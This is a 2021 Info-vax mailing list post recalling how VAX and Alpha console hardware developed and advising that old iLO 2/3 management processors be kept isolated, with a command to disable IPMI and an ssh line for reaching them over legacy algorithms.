[Info-vax] RX2800 i4 iLO 3 firmware

Wed Jun 23 12:58:40 EDT 2021

On 2021-06-22 23:27:16 +0000, <kemain.nospam at gmail.com> said:

> Out of band server management like ILO's, DRAC including remote power 
> mgmt. strategies has been around for decades (early 1980's).

Outboard console was more of a necessity back then, as the earliest VAX 
itself was comparatively, well, stupid.

The VAX-11/780 operated as a peripheral of an LSI-11, in a manner of 
consideration. Boot the LSI, which then loads and boots Star and 
Starlet.

Later VAX systems got somewhat smarter.

Remote management was something comparatively new for OpenVMS folks, 
first arriving with Itanium for many of the OpenVMS sites around.

> VAX Nautilus and Polarstar systems used external PRO-350/380 PC systems 
> to manage (including Poff/Pon, searchable soft log files) VAX systems.

The Nautilus family used Pro 350 and Pro 380 hardware, with those boxes 
renamed as VAX console. The Polarstar family used a MicroVAX II as the 
console. The MicroVAX was one of the distinguishing features of 
Polarstar. VAX-11/780 used an LSI-11, as mentioned above. The VAX 9000 
service processor unit comprised of 4 MicroVAX II processors. Alpha 
eventually added RCM and RMC hardware outboard, all the way up to the 
entirely gonzo server management network present within the 
Marvel-class AlphaServer boxes; AlphaServer GS1280, etc.

IBM used last year's mainframe model as this year's channel controller 
as that old joke went, and analogous jokes about VAX consoles.

None of these VAX and Alpha consoles was supported for remote Ethernet 
network access, with the gear supporting remote serial access at best. 
Early on, this serial access was intended for DEC Field Service to dial 
in (modems, remember those?) and diagnose the server.

Yes, some older sites did routinely use terminal servers as a 
workaround for remote console access, or used a console app such as 
VAXcluster Console System (VCS) or Minicom and serial cabling, or 
screen/tmux, etc. And I've remotely tapped into the Marvel internal 
network, as have others. These were wildly insecure, by present-day 
standards.

HP and HPE iLO, Dell iDRAC, the SuperMicro BMC, and various other 
available gear all substantially improve on what the older server 
consoles could do, though. Particularly around remote management and 
monitoring and automation, and with far better support for server 
installation. And with better connection security. (Usually. Somewhat. 
See below.)

For lower-end boxes, Intel vPro and AMD Pro management access is 
available from various vendors.

iLO 2 and iLO 2 are hardware limited and which reportedly constrains 
what is possible with the hardware, and are nowadays best kept 
isolated. There are exploits against these, including the CVE-2013-4786 
vulnerability.

"There is no resolution to this issue. The authentication process for 
the IPMI 2.0 specification mandates that the server send a salted SHA1 
or MD5 hash of the requested user's password to the client, prior to 
the client authenticating. The BMC returns the password hash for any 
valid user account requested. This password hash can be broken using an 
offline brute force or dictionary attack. Because this functionality is 
a key part of the IPMI 2.0 specification, there is no way to fix the 
problem without deviating from the IPMI 2.0 specification."

Meaning you will want to disable IPMI ( MP:CM> sa -lanipmi d ) if 
you're not using it, and not on a constrained-access management network.

And another reason for isolation: iLO 2 and iLO 3 ssh security is badly 
down-revision, which means connecting using something similar to this: 
ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss -o 
KexAlgorithms=diffie-hellman-group1-sha1 -o Ciphers=aes128-cbc,3des-cbc 
-o MACs=hmac-md5,hmac-sha1 User at Server.Example.Com

-- 
Pure Personal Opinion | HoffmanLabs LLC 